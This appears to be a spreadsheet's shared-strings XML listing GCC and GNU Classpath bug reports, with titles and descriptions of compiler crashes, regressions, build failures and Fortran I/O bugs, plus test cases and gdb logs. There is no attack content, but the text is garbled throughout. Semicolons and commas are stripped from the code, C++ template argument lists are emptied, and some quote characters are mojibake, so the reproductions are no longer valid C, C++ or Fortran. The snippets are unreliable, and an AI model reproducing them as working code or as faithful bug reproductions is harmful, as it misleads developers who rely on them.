    <t>GCC-17657</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in expand_case</t>
  </si>
  <si>
    <t>// { dg-do compile }
// { dg-options -O2 }
extern int foo (int)
void
bar (void)
{
  char tmp = foo (0)
  switch (tmp)
    {
    case 1: foo (1) break
    case 2: foo (2) break
    case 3: foo (3) break
    case 4: foo (4) break
    case 5: foo (5) break
    case 6: foo (6) break
    case 7: foo (7) break
    case 255: foo (8) break
    default: break
    }
}
ICEs at -O2 while it works with GCC 3.4.2.  The ICE is in expand_case which
calls tree_low_cst on !host_integerp () INTEGER_CST.
In C this generates warning but compiles it without ICEing.</t>
  </si>
  <si>
    <t>GCC-38515</t>
  </si>
  <si>
    <t>Disabling PPL/CLOOG with configure does not work</t>
  </si>
  <si>
    <t>--disable-ppl and --without-ppl are accepted but still ./configure searches for PPL/CLOOG finds them and enables them.
Expected: One can build 4.4 also without PPL/CLOOG even if they are installed.</t>
  </si>
  <si>
    <t>GCC-43440</t>
  </si>
  <si>
    <t>Overwriting neon quad register does not clobber all included single registers</t>
  </si>
  <si>
    <t>Function:
float y
float foo(float x)
{
    y = x * x + x
    asm volatile (vmov.i8 q0 #0 ::: q0)
    asm volatile (vmov.i8 q1 #0 ::: q1)
    asm volatile (vmov.i8 q2 #0 ::: q2)
    asm volatile (vmov.i8 q3 #0 ::: q3)
    asm volatile (vmov.i8 q4 #0 ::: q4)
    asm volatile (vmov.i8 q5 #0 ::: q5)
    asm volatile (vmov.i8 q6 #0 ::: q6)
    asm volatile (vmov.i8 q7 #0 ::: q7)
    return y
}
being compiled with -O -Wall -mcpu=cortex-a8 -mfpu=neon -mfloat-abi=softfp always returns 0.
The cause of incorrect behaviour is that in function foo y is allocated on s15 which is not considered clobbered by asm volatile (vmov.i8 q3 #0 ::: q3). Mentioning in clobber lists s1 s2 and s3 alongside q0 s5 s6 and s7 alongside q1 and so on solves the problem: clobbered register got spilled. Omitting any of them makes GCC allocate y on this register and do not spill it.
I also noticed that only d8 d10 d12 and d14 got saved at the beginning of the function though all d8-d15 should be saved. This was mentioned in bug #42321 comment #1 also.
I tried this example on 4.4.3 and today's trunk.</t>
  </si>
  <si>
    <t>batuzovk</t>
  </si>
  <si>
    <t>GCC-13349</t>
  </si>
  <si>
    <t>[3.3 regression] Infinite memory usage for invalid code</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an infinite loop in gcc 3.3.x:
======================================
namespace A {}
namespace B { using namespace A }
namespace A { using namespace B }
A::X x
======================================
Previous versions and mainline issue a correct error message.
This is a redux of the second bug in PR 11282.</t>
  </si>
  <si>
    <t>GCC-52221</t>
  </si>
  <si>
    <t>[libffi] r183675r184021 needs to be fixed.</t>
  </si>
  <si>
    <t>tried libjava with r184135 but got SIGSEGV because of following.
in libffi/src/x86/ffi.c
#define FFI_INIT_TRAMPOLINE_THISCALL(TRAMPFUNCTXSIZE) \
{ unsigned char *__tramp = (unsigned char*)(TRAMP) \
   unsigned int  __fun = (unsigned int)(FUN) \
   unsigned int  __ctx = (unsigned int)(CTX) \
   unsigned int  __dis = __fun - (__ctx + 22)  \
                                         ^^^^
                                          49
and fixing above didn't succeed ExtraClassLoader testcase
Starting program: /tmp/gcc/i686-pc-mingw32/libjava/testsuite/ExtraClassLoader
[New Thread 412.0xa24]
[New Thread 412.0x1398]
Program received signal SIGSEGV Segmentation fault.
0x696c8140 in java::lang::Class* java::lang::Object::getClass() ()
   from /cygdrive/d/cygwin/tmp/gcc/i686-pc-mingw32/libjava/.libs/libgcj-13.dll
(gdb) i r
eax            0xe      0xe
ecx            0x8df4458b       0x8df4458b
edx            0x22f9c4 0x22f9c4
ebx            0x1      0x1
esp            0x22f9c4 0x22f9c4
ebp            0x22f9c8 0x22f9c8
esi            0xc01b24 0xc01b24
edi            0xc01b3c 0xc01b3c
eip            0x696c8140       0x696c8140 
eflags         0x10202  [ IF RF ]
cs             0x1b     0x1b
ss             0x23     0x23
ds             0x23     0x23
es             0x23     0x23
fs             0x3b     0x3b
gs             0x0      0x0
(gdb) set height 1000
(gdb) bt
#0  0x696c8140 in java::lang::Class* java::lang::Object::getClass() ()
   from /cygdrive/d/cygwin/tmp/gcc/i686-pc-mingw32/libjava/.libs/libgcj-13.dll
#1  0x69ce1735 in ffi_call_win32 () at ../.././libffi/src/x86/win32.S:464
#2  0x69ce1608 in ffi_raw_call (cif=0xc01b24
    fn=0x696c8140 
    rvalue=0x22fbe8 fake_avalue=0x22fa54) at ../.././libffi/src/x86/ffi.c:832
#3  0x6969bd0e in _Jv_InterpMethod::run (retp=0x22fd50 args=0x22fd70
    meth=0xac9e10) at ../.././libjava/interpret-run.cc:611
#4  0x69ce1905 in ffi_closure_raw_SYSV () at ../.././libffi/src/x86/win32.S:749
#5  0x00fa0039 in ?? ()
#6  0x004087bf in ExtraClassLoader.main(java.lang.String[])void ()
    at ExtraClassLoader.java:9
#7  0x696bd642 in gnu::java::lang::MainThread::call_main (this=0xc0ef60)
    at ../.././libjava/gnu/java/lang/natMainThread.cc:54
#8  0x696fa4d6 in gnu.java.lang.MainThread.run()void (this=@c0ef60)
    at /tmp/gcc/libjava/gnu/java/lang/MainThread.java:106
#9  0x696cc062 in _Jv_ThreadRun (thread=0xc0ef60)
    at ../.././libjava/java/lang/natThread.cc:335
#10 0x69683f5d in _Jv_RunMain (vm_args=0x0 klass=klass@entry=0x40a160
    name=name@entry=0x0 argc=argc@entry=0x1 argv=argv@entry=0x3d8958
    is_jar=is_jar@entry=0x0) at ../.././libjava/prims.cc:1795
#11 0x69684156 in _Jv_RunMain (klass=klass@entry=0x40a160
    name=name@entry=0x0 argc=argc@entry=0x1 argv=argv@entry=0x3d8958
    is_jar=is_jar@entry=0x0) at ../.././libjava/prims.cc:1820
#12 0x696841bf in JvRunMain (klass=0x40a160 argc=0x1 argv=0x3d8958)
    at ../.././libjava/prims.cc:1826
#13 0x00401402 in _fu0___Jv_Compiler_Properties () at /tmp/cckDh2w0.i:11
#14 0x004010fd in __mingw_CRTStartup () at ../../.././winsup/mingw/crt1.c:244
#15 0x00000408 in ?? ()
#16 0x7ffd7000 in ?? ()
#17 0x00000000 in ?? ()
Warning: the current language does not match this frame.
(gdb)
it seems that thiscall trampoline works correctly.
0x00fa0022 in ?? ()
4: $ebx = 0x696c5603
3: $ecx = 0x696c5603
2: $eax = 0xfa0008
1: x/i $eip
=&gt; 0xfa0022:    call   0x69ce18be 
(gdb)
0x69ce18be in ffi_closure_SYSV () at ../.././libffi/src/x86/win32.S:715
715             ret
4: $ebx = 0x696c5603
3: $ecx = 0x696c5603
2: $eax = 0xfa0008
1: x/i $eip
=&gt; 0x69ce18be :
    jbe    0x69ce18c0 
(gdb) si
ffi_closure_raw_SYSV () at ../.././libffi/src/x86/win32.S:734
734             pushl   %ebp
4: $ebx = 0x696c5603
3: $ecx = 0x696c5603
2: $eax = 0xfa0008
1: x/i $eip
=&gt; 0x69ce18c0 :   push   %ebp
(gdb) b ffi_call_win32
Breakpoint 4 at 0x69ce16e3: file ../.././libffi/src/x86/win32.S line 433.
(gdb) c
Continuing.
Breakpoint 4 ffi_call_win32 () at ../.././libffi/src/x86/win32.S:433
433             movl  20(%ebp)%ecx                                             
4: $ebx = 0x1
3: $ecx = 0xe
2: $eax = 0x22fa0c
1: x/i $eip
=&gt; 0x69ce16e3 :       mov    0x14(%ebp)%ecx
(gdb) bt
#0  ffi_call_win32 () at ../.././libffi/src/x86/win32.S:433
#1  0x69ce15e8 in ffi_raw_call (cif=0xc01bec fn=
    0x696d4940  rvalue=0x22fbf0
    fake_avalue=0x22fa58) at ../.././libffi/src/x86/ffi.c:827
#2  0x6969bd0e in _Jv_InterpMethod::run (retp=0x22fd58 args=0x22fd78
    meth=0xac9e10) at ../.././libjava/interpret-run.cc:611
#3  0x69ce18e5 in ffi_closure_raw_SYSV () at ../.././libffi/src/x86/win32.S:749
#4  0x00fa0027 in ?? ()
#5  0x004087bf in ExtraClassLoader.main(java.lang.String[])void ()
    at ExtraClassLoader.java:9
#6  0x696bd642 in gnu::java::lang::MainThread::call_main (this=0xc0ef60)
    at ../.././libjava/gnu/java/lang/natMainThread.cc:54
#7  0x696fa4d6 in gnu.java.lang.MainThread.run()void (this=@c0ef60)
    at /tmp/gcc/libjava/gnu/java/lang/MainThread.java:106
#8  0x696cc062 in _Jv_ThreadRun (thread=0xc0ef60)
    at ../.././libjava/java/lang/natThread.cc:335
#9  0x69683f5d in _Jv_RunMain (vm_args=0x0 klass=klass@entry=0x40a160
    name=name@entry=0x0 argc=argc@entry=0x1 argv=argv@entry=0x3d8958
    is_jar=is_jar@entry=0x0) at ../.././libjava/prims.cc:1795
#10 0x69684156 in _Jv_RunMain (klass=klass@entry=0x40a160
    name=name@entry=0x0 argc=argc@entry=0x1 argv=argv@entry=0x3d8958
    is_jar=is_jar@entry=0x0) at ../.././libjava/prims.cc:1820
#11 0x696841bf in JvRunMain (klass=0x40a160 argc=0x1 argv=0x3d8958)
    at ../.././libjava/prims.cc:1826
#12 0x00401402 in _fu0___Jv_Compiler_Properties () at /tmp/cckDh2w0.i:11
#13 0x004010fd in __mingw_CRTStartup () at ../../.././winsup/mingw/crt1.c:244
#14 0x00000408 in ?? ()
#15 0x7ffdd000 in ?? ()
#16 0x00000000 in ?? ()
(gdb) ni
ffi_prep_args (stack=0x22f9cc \032 ecif=0x22fa0c)
    at ../.././libffi/src/x86/ffi.c:46
warning: Source file is more recent than executable.
46      {
4: $ebx = 0x1
3: $ecx = 0x4
2: $eax = 0x22f9cc
1: x/i $eip
=&gt; 0x69ce0eb0 :  push   %ebp
(gdb) finish
Run till exit from #0  ffi_prep_args (stack=0x22f9cc \032 ecif=0x22fa0c)
    at ../.././libffi/src/x86/ffi.c:46
ffi_call_win32 () at ../.././libffi/src/x86/win32.S:444
444             addl  $8%esp
4: $ebx = 0x1
3: $ecx = 0x1
2: $eax = 0xe
1: x/i $eip
=&gt; 0x69ce16f1 :      add    $0x8%esp
(gdb) ni
447             cmpl $3 16(%ebp)  # FFI_THISCALL
4: $ebx = 0x1
3: $ecx = 0x1
2: $eax = 0xe
1: x/i $eip
=&gt; 0x69ce16f4 :      cmpl   $0x30x10(%ebp)
(gdb)
448             jz .do_thiscall
4: $ebx = 0x1
3: $ecx = 0x1
2: $eax = 0xe
1: x/i $eip
=&gt; 0x69ce16f8 :      je     0x69ce170c 
(gdb)
456             movl (%esp) %ecx
4: $ebx = 0x1
3: $ecx = 0x1
2: $eax = 0xe
1: x/i $eip
=&gt; 0x69ce170c :      mov    (%esp)%ecx
(gdb) x $esp
0x22f9cc:       0x8df4458b
parameter is broken for sure. please check ffi_prep_args</t>
  </si>
  <si>
    <t>GCC-46433</t>
  </si>
  <si>
    <t>var-tracking.c doesn't include tm_p.h</t>
  </si>
  <si>
    <t>xstormy-elf --enable-werror-always build fails with:
../../../gcc/gcc/var-tracking.c: In function â€˜vt_stack_adjustmentsâ€™:
../../../gcc/gcc/var-tracking.c:629:3: error: implicit declaration of function â€˜xstormy16_interrupt_function_pâ€™ [-Werror=implicit-function-declaration]
var-tracking.c uses target macros but does not include tm_p.h .</t>
  </si>
  <si>
    <t>GCC-43298</t>
  </si>
  <si>
    <t>fortran library does not read in NaN -Inf or Inf</t>
  </si>
  <si>
    <t>As I understand it fortran should be able to read in a NaN or Inf value.
See 10.6.1.2.1 F editing in the Fortran 2003 specification.  This is a new Fortran 2003 feature and is not in the Fortran 95 specification.
gfortran properly prints out the NaN values but cannot read them in thus causing the following program to fail:
program nan_test         
  character(15) :: nan = '  NAN -INF  INF'
  real :: abc d = 0.0
  print ('(3F5.2)')0.0/d-1.0/d1.0/d
  read (nan'(3F5.2)')abc
  print *f
end program nan_test
I have tried with both 4.5.0 20100121 and 4.4.3.</t>
  </si>
  <si>
    <t>GCC-30559</t>
  </si>
  <si>
    <t>[4.3 Regression] compiler loops forever with flag -O3</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package libnasl-2.2.6-40
with the new GNU C compiler version 4.3 snapshot 20070119.
I used compiler flag -O3. The compiler appeared to hang
for more than 30 minutes when compiling source code file regex.c.
I tried compiling the same file with the same compiler and
flag -O2 and the compiler took 5 seconds.
I tried compiling the same file with gcc 4.1.2 and flag -O3
and that compiler took 2.3 seconds.
I checked the memory usage of the 20070119 compiler and
it was about 40Megs on an idle system with 512Meg of RAM 
fitted.
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-8817</t>
  </si>
  <si>
    <t>Failed to cross compile linux-2.4.19 kernel for StrongARM.</t>
  </si>
  <si>
    <t>arm-linux-gcc -D__KERNEL__ -I/opt/cross_compiler/build/linux-2.4.19-arm/include -Wall -Wstrict-prototypes -Wno-trigraphs -Os -fno-strict-aliasing -fno-common -Uarm -fno-common -pipe -mapcs-32 -D__LINUX_ARM_ARCH__=4 -march=armv4 -mtune=strongarm1100 -mshort-load-bytes -msoft-float   -nostdinc -I /opt/cross_compiler/strongarm-root/usr//lib/gcc-lib/arm-linux/3.3/include -DKBUILD_BASENAME=ll_rw_blk  -DEXPORT_SYMTAB -c ll_rw_blk.c
ll_rw_blk.c: In function `__blk_cleanup_queue':
ll_rw_blk.c:163: warning: comparison between signed and unsigned
ll_rw_blk.c: In function `ll_new_segment':
ll_rw_blk.c:256: warning: comparison between signed and unsigned
ll_rw_blk.c: In function `locate_hd_struct':
ll_rw_blk.c:628: warning: comparison between signed and unsigned
ll_rw_blk.c: In function `blkdev_release_request':
ll_rw_blk.c:765: warning: comparison between signed and unsigned
ll_rw_blk.c: In function `attempt_merge':
ll_rw_blk.c:788: warning: comparison between signed and unsigned
ll_rw_blk.c: In function `__make_request':
ll_rw_blk.c:971: warning: comparison between signed and unsigned
arm-linux-gcc -D__KERNEL__ -I/opt/cross_compiler/build/linux-2.4.19-arm/include -Wall -Wstrict-prototypes -Wno-trigraphs -Os -fno-strict-aliasing -fno-common -Uarm -fno-common -pipe -mapcs-32 -D__LINUX_ARM_ARCH__=4 -march=armv4 -mtune=strongarm1100 -mshort-load-bytes -msoft-float   -nostdinc -I /opt/cross_compiler/strongarm-root/usr//lib/gcc-lib/arm-linux/3.3/include -DKBUILD_BASENAME=blkpg  -DEXPORT_SYMTAB -c blkpg.c
blkpg.c: In function `add_partition':
blkpg.c:94: warning: comparison between signed and unsigned
blkpg.c:104: warning: comparison between signed and unsigned
blkpg.c:105: warning: comparison between signed and unsigned
blkpg.c: In function `del_partition':
blkpg.c:140: warning: comparison between signed and unsigned
blkpg.c: In function `blkpg_ioctl':
blkpg.c:179: warning: comparison between signed and unsigned
blkpg.c: In function `blk_ioctl':
blkpg.c:285: warning: comparison between signed and unsigned
blkpg.c:252: error: asm-specifier for variable `__r1' conflicts with asm clobber list
blkpg.c:252: internal compiler error: asm clobber conflict with input operand
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [blkpg.o] Error 1
make[3]: Leaving directory `/opt/cross_compiler/build/linux-2.4.19-arm/drivers/block'
make[2]: *** [first_rule] Error 2
make[2]: Leaving directory `/opt/cross_compiler/build/linux-2.4.19-arm/drivers/block'
make[1]: *** [_subdir_block] Error 2
make[1]: Leaving directory `/opt/cross_compiler/build/linux-2.4.19-arm/drivers'
make: *** [_dir_drivers] Error 2
Release:
gcc-3.3 (cvs snapshot 2002.12.05)
Environment:
cross compile for StrongARM with gcc-3.3 snapshot</t>
  </si>
  <si>
    <t>GCC-23350</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in vect_update_ivs_after_vectorizer at tree-vect-transform.c:2418</t>
  </si>
  <si>
    <t>When I compile ace542 with the actual snapshot (20050806) of gcc41 I get an ICE
when I use -O3 and autovectorisation.
last working snapshot is:   gcc-4.1-20050604
first failing snapshot is:  gcc-4.1-20050611
Michael Cieslinski
g++41j -O3 -ftree-vectorize -c -o .obj/Reactive_Logging_Server_Ex.o 
Reactive_Logging_Server_Ex.ii
Reactive_Logging_Server_Ex.h: In member function 'virtual int 
Reactive_Logging_Server_Ex::handle_connections()':
Reactive_Logging_Server_Ex.h:54: internal compiler error: in 
vect_update_ivs_after_vectorizer at tree-vect-transform.c:2418
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
g++41j -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.1-20050806/configure --prefix=/usr/local/gcc41j
 --program-suffix=41j --with-arch=opteron --enable-languages=cc++
 --enable-checking
Thread model: posix
gcc version 4.1.0 20050806 (experimental)</t>
  </si>
  <si>
    <t>GCC-57189</t>
  </si>
  <si>
    <t>[4.9 Regression] Vector register is spilled for vector extract pattern</t>
  </si>
  <si>
    <t>Following testcase:
--cut here--
typedef int __v4si __attribute__ ((__vector_size__ (16)))
int test (__v4si __A)
{
  return __builtin_ia32_vec_ext_v4si (__A 0)
}
--cut here--
compiled with '-O2 -msse2 -march=k8 generates:
test:
        movaps  %xmm0 -24(%rsp)
        movl    -24(%rsp) %eax
        ret
where 4.8 generates:
test:
        movd    %xmm0 -12(%rsp)
        movl    -12(%rsp) %eax
        ret
The problem is with IRA which spills V4SImode where reload spills SImode register for:
(insn 6 3 12 2 (set (reg:SI 62)
        (vec_select:SI (reg/v:V4SI 61 [ __A ])
            (parallel [
                    (const_int 0 [0])
                ]))) t.c:5 1618 {*vec_extractv4si_0}
 This memory mismatch could lead to a partial memory stall.</t>
  </si>
  <si>
    <t>GCC-69851</t>
  </si>
  <si>
    <t>[6 Regression] ICE:  in assign_temp at function.c:961</t>
  </si>
  <si>
    <t>markus@x4 tmp % cat subprocess.ii
namespace std {
template  struct integral_constant {
  static constexpr _Tp value = 0
}
template  struct conditional
template  struct __or_
template 
struct __or_ : conditional::type {}
template  struct is_enum : integral_constant {}
template  struct remove_reference
template  struct remove_reference&lt;_Tp  }
template  struct decay {
  typedef typename remove_reference::type type
}
template  struct conditional { typedef is_enum type }
template  struct _Head_base { _Head _M_head_impl }
template  struct _Tuple_impl
template 
struct _Tuple_impl : _Tuple_impl
                                            _Head_base {
  _Tuple_impl(_Tuple_impl 
  _Tuple_impl(_Tuple_impl &amp;&amp;__in) : _Tuple_impl(__in) {}
}
template 
struct _Tuple_impl {}
template  struct tuple : _Tuple_impl {}
template  struct _Bind
template 
struct _Bind {
  tuple _M_bound_args
}
template ::type&gt;
using __is_socketlike = __or_ is_enum&gt;
template  struct _Bind_helper {
  typedef _Bind::type...)&gt; type
}
template 
typename _Bind_helper::value _BoundArgs...&gt;::type
bind(_Func 
struct _Any_data {
  template  _Tp _M_access() const
}
enum _Manager_operation {}
template  struct function
struct _Function_base {
  template  struct _Base_manager {
    static bool _M_manager(_Any_data &amp; const _Any_data &amp;__source
                           _Manager_operation) {
      _Functor(*__source._M_access())
    }
  }
  typedef bool (*_Manager_type)(_Any_data &amp; const _Any_data &amp;
                                _Manager_operation)
  _Manager_type _M_manager
}
template  struct _Function_handler
template 
struct _Function_handler
    : _Function_base::_Base_manager {}
template 
struct function : _Function_base {
  template  using _Requires = int
  template 
            typename = _Requires&gt;
  function(_Functor)
  _Res operator()(_ArgTypes...)
}
template 
template 
function::function(_Functor) {
  _M_manager = _Function_handler::_M_manager
}
}
struct Option {
  Option(Option 
}
using std::bind
using std::function
struct Subprocess {}
using InputFileDescriptors = Subprocess
using OutputFileDescriptors = int
void defaultClone(Option setup) {
  InputFileDescriptors stdinfds
  OutputFileDescriptors stdoutfds envp
  function)&gt; clone = 0
  int pipes = clone(bind(envp setup stdinfds stdoutfds pipes))
}
markus@x4 tmp % g++ -c subprocess.ii
subprocess.ii: In copy constructor â€˜std::_Tuple_impl::_Tuple_impl(std::_Tuple_impl _Head = Option _Tail = {Subprocess int int}]â€™:
subprocess.ii:21:3: internal compiler error: in assign_temp at function.c:961
   _Tuple_impl(_Tuple_impl 
   ^~~~~~~~~~~
0xa51353 assign_temp(tree_node* int int)
        ../../gcc/gcc/function.c:961
0x9e9e25 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/gcc/expr.c:10408
0x9f9048 expand_normal
        ../../gcc/gcc/expr.h:262
0x9f9048 store_field
        ../../gcc/gcc/expr.c:6679
0x9f4c7d expand_assignment(tree_node* tree_node* bool)
        ../../gcc/gcc/expr.c:5021
0x8e79de expand_gimple_stmt_1
        ../../gcc/gcc/cfgexpand.c:3606
0x8e79de expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:3702
0x8e9e88 expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5708
0x8efe96 execute
        ../../gcc/gcc/cfgexpand.c:6323</t>
  </si>
  <si>
    <t>GCC-54711</t>
  </si>
  <si>
    <t>Fix --target_board examples on test.html page</t>
  </si>
  <si>
    <t>From http://gcc.gnu.org/install/test.html
You can run the testsuites multiple times using combinations of options with a syntax similar to the brace expansion of popular shells:
     ...--target_board=arm-sim\{-mhard-float-msoft-float\}\{-O1-O2-O3\}
(Note the empty option caused by the trailing comma in the final group.) The following will run each testsuite eight times using the `arm-sim' target as if you had specified all possible combinations yourself:
     --target_board=arm-sim/-mhard-float/-O1
     --target_board=arm-sim/-mhard-float/-O2
     --target_board=arm-sim/-mhard-float/-O3
     --target_board=arm-sim/-mhard-float
     --target_board=arm-sim/-msoft-float/-O1
     --target_board=arm-sim/-msoft-float/-O2
     --target_board=arm-sim/-msoft-float/-O3
     --target_board=arm-sim/-msoft-float
If you run 'runtest' with multiple --target_board options only the last one will get run.  The list should show:
     --target_board='arm-sim/-mhard-float/-O1 \
                     arm-sim/-mhard-float/-O2 \
                     arm-sim/-mhard-float/-O3 \
                     arm-sim/-mhard-float \
                     arm-sim/-msoft-float/-O1 \
                     arm-sim/-msoft-float/-O2 \
                     arm-sim/-msoft-float/-O3 \
                     arm-sim/-msoft-float'
I.e. a single --target_board option with multiple space separated board names.
That is the equivelant of the initial target_board list that uses the braces.</t>
  </si>
  <si>
    <t>GCC-35005</t>
  </si>
  <si>
    <t>New testcase execute/20071211-1.c assumes 32 bit integers</t>
  </si>
  <si>
    <t>The new testcase execute/20071211-1.c assumes 32 bit integers and fails on machines with 16 bit integers.</t>
  </si>
  <si>
    <t>GCC-58852</t>
  </si>
  <si>
    <t>ASSOCIATE returns nothing after changing the value</t>
  </si>
  <si>
    <t>Created attachment 31081
Minimal working example for associate bug (?)
Hello. I was not able to find anything online related to this problem so here goes.
I would like to use the ASSOCIATE feature of fortran to shorten the names of some variables. However when I use the associated variable as a subroutine argument something goes wrong and the variable values are not passed as arguments correctly.
I have attached a minimal working example to show what I mean. Any feedback is welcome.</t>
  </si>
  <si>
    <t>sarantis.pantazis</t>
  </si>
  <si>
    <t>GCC-26088</t>
  </si>
  <si>
    <t>internal compiler error: in uses_template_parms at cp/pt.c:4956</t>
  </si>
  <si>
    <t>When I try to compile the file bug.cpp with
g++ bug.cpp -o bug
gcc gives the error message
bug.cpp:6: internal compiler error: in uses_template_parms at cp/pt.c:4956
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccgqpcU3.out file please attach this to your bugreport.
I am using gcc 4.0.1 on Fedora Core 4. The output of gcc -v is
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++objcjavaf95ada --enable-java-awt=gtk --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --host=i386-redhat-linux
Thread model: posix
gcc version 4.0.1 20050727 (Red Hat 4.0.1-5)
The contents of the file bug.cpp are:
--
template class T int (*f)(int) &gt;
class A {
public:
	static int fun(int x) { return f(x) }
	T t
}
int main() { return 0 }
--
The preporcessed source:
--
// /usr/libexec/gcc/i386-redhat-linux/4.0.1/cc1plus -quiet -D_GNU_SOURCE bug.cpp -quiet -dumpbase bug.cpp -auxbase bug -o - -frandom-seed=0
# 1 bug.cpp
# 1 
# 1 
# 1 bug.cpp
template class T int (*f)(int) &gt;
class A {
public:
 static int fun(int x) { return f(x) }
 T t
}
int main() { return 0 }
--</t>
  </si>
  <si>
    <t>szhorvat</t>
  </si>
  <si>
    <t>GCC-42559</t>
  </si>
  <si>
    <t>[4.5 Regression] ice in emit_block_move_hints with -O2</t>
  </si>
  <si>
    <t>I just tried to compile the package libhugetlbfs-2.5 with the GNU
C compiler version 4.5 snapshot 20091224 and the compiler said
n file included from /usr/include/string.h:640:0
                 from icache-hygiene.c:37:
/usr/include/bits/string3.h: In function 'jumpfunc':
/usr/include/bits/string3.h:52:3: internal compiler error: in emit_block_move_hints at expr.c:1197
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-16805</t>
  </si>
  <si>
    <t>Runtime failure using list directed read from string</t>
  </si>
  <si>
    <t>Test code:
      PROGRAM rdch
!
      IMPLICIT NONE
!
      REAL                 :: fp
      CHARACTER (LEN = 10) :: ch
!
      ch = '    1     '
!
      WRITE (6*) 'ch = ' ch
      READ (ch(5:5)*) fp
      WRITE (6*) 'fp = ' fp
!
      STOP
      END
Produces runtime error:
At line 11 of file rdch.f95
Fortran runtime error: Inappropriate ioctl for device
 ch =     1     
Compilation output:
Driving: gfortran -v -Wall -save-temps -o rdch rdch.f95 -lgfortranbegin
-lgfortran -lm -shared-libgcc
Reading specs from /home/martin/GCC/usr/local/lib/gcc/i686-pc-linux-gnu/3.5.0/specs
Configured with: ../gcc/configure --prefix=/home/martin/GCC/usr/local :
(reconfigured) ../gcc/configure --prefix=/home/martin/GCC/usr/local
--enable-languages=f95 : (reconfigured) ../gcc/configure
--prefix=/home/martin/GCC/usr/local
--with-gcc-version-trigger=/home/martin/GCC/gcc/gcc/version.c
--enable-languages=cf95 --no-create --no-recursion : (reconfigured)
../gcc/configure --prefix=/home/martin/GCC/usr/local --enable-languages=f95 :
(reconfigured) ../gcc/configure --prefix=/home/martin/GCC/usr/local
--with-gcc-version-trigger=/home/martin/GCC/gcc/gcc/version.c
--enable-languages=cf95 --no-create --no-recursion : (reconfigured)
../gcc/configure --prefix=/home/martin/GCC/usr/local
--with-gcc-version-trigger=/home/martin/GCC/gcc/gcc/version.c
--enable-languages=cf95 --no-create --no-recursion : (reconfigured)
../gcc/configure --prefix=/home/martin/GCC/usr/local --enable-languages=f95
Thread model: posix
gcc version 3.5.0 20040726 (experimental)
 /home/martin/GCC/usr/local/libexec/gcc/i686-pc-linux-gnu/3.5.0/f951 rdch.f95
-quiet -dumpbase rdch.f95 -mtune=pentiumpro -auxbase rdch -Wall -version -o rdch.s
GNU F95 version 3.5.0 20040726 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.5.0 20040726 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -V -Qy -o rdch.o rdch.s
GNU assembler version 2.15.90.0.3 (i386-redhat-linux) using BFD version
2.15.90.0.3 20040415
 /home/martin/GCC/usr/local/libexec/gcc/i686-pc-linux-gnu/3.5.0/collect2
--eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o rdch
/usr/lib/crt1.o /usr/lib/crti.o
/home/martin/GCC/usr/local/lib/gcc/i686-pc-linux-gnu/3.5.0/crtbegin.o
-L/home/martin/GCC/usr/local/lib/gcc/i686-pc-linux-gnu/3.5.0
-L/home/martin/GCC/usr/local/lib/gcc/i686-pc-linux-gnu/3.5.0/../../.. rdch.o
-lgfortranbegin -lgfortran -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc
/home/martin/GCC/usr/local/lib/gcc/i686-pc-linux-gnu/3.5.0/crtend.o /usr/lib/crtn.o
Similar code performs as expected for g77. Code known to work with SUN Workshop 6.</t>
  </si>
  <si>
    <t>aovb94</t>
  </si>
  <si>
    <t>GCC-68269</t>
  </si>
  <si>
    <t>[5 regression] FAIL: gcc.dg/pr68129_1.c (internal compiler error)</t>
  </si>
  <si>
    <t>Both -O and -fno-split-wide-types are required to trigger the ICE.
$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/pr68129_1.c -O -fno-split-wide-types -S -o pr68129_1.s
../gcc/testsuite/gcc.dg/pr68129_1.c: In function â€˜fooâ€™:
../gcc/testsuite/gcc.dg/pr68129_1.c:10:1: internal compiler error: in simplify_const_binary_operation at simplify-rtx.c:3950
 }
 ^
0x4000000000c3a8bf simplify_const_binary_operation(rtx_code machine_mode rtx_def* rtx_def*)
        ../../gcc/simplify-rtx.c:3950
0x4000000000c3a54f simplify_binary_operation(rtx_code machine_mode rtx_def* rtx_def*)
        ../../gcc/simplify-rtx.c:1990
0x4000000000c4376f simplify_gen_binary(rtx_code machine_mode rtx_def* rtx_def*)
        ../../gcc/simplify-rtx.c:194
0x40000000014fc92f expand_field_assignment
        ../../gcc/combine.c:7234
0x40000000014ffc3f can_combine_p
        ../../gcc/combine.c:1910
0x400000000152e55f try_combine
        ../../gcc/combine.c:2961
0x400000000153c06f combine_instructions
        ../../gcc/combine.c:1267
0x400000000153c06f rest_of_handle_combine
        ../../gcc/combine.c:14278
0x400000000153c06f execute
        ../../gcc/combine.c:14321</t>
  </si>
  <si>
    <t>CLASSPATH-27828</t>
  </si>
  <si>
    <t>Overly aggressive use of InetAddress.getHostName()</t>
  </si>
  <si>
    <t>One of the InetSocketAddress constructors includes...
    this.hostname = addr.getHostName()
This seems overly aggressive.  In comparing azureus log files from Sun and gcj runs it looks like Sun's libraries take a lazy approach to getting the hostname.
